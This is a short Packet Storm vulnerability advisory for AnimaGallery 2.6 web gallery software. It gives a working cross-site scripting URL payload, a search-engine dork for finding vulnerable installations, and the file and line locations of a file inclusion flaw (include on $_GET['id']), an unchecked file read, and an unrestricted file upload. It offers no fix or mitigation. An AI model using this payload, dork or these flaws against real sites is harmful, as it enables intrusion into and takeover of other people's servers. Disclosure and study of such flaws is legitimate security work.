AnimaGallery 2.6 LFI / XSS / File Upload

2015-06-04T00:00:00
ID PACKETSTORM:132150
Type packetstorm
Reporter indoushka
Modified 2015-06-04T00:00:00

Description

                                        
                                            `AnimaGallery 2.6 Mullti Vulnerability  
=====================================  
Author : indoushka  
Vondor : http://dg.no.sapo.pt/AnimaGallery2.6.zip  
Dork : Powered By Anima Gallery 2.6 Copyright 2007-2014   
=========================  
  
Xss :  
  
/AnimaGallery/?id=.</title><ScRiPt%20>prompt(939678)</ScRiPt>&load=dir&refresh=1  
  
C:\AppServ\www\AnimaGallery\func.php  
LIne : 1308  
echo  
$THEME  
  
Remote/Local File Inclutions :  
  
C:\AppServ\www\AnimaGallery\func.php  
Line : 1118  
include  
$_GET['id']  
  
File Access :  
  
C:\AppServ\www\AnimaGallery\func.php  
Line : 6133  
file_get_contents  
$filename  
  
File Upload :  
  
C:\AppServ\www\AnimaGallery\func.php  
  
Line : 3405  
move_uploaded_file  
$_FILES['newimage'],$dest,$_POST['rename'],$sfv_n,$dest  
`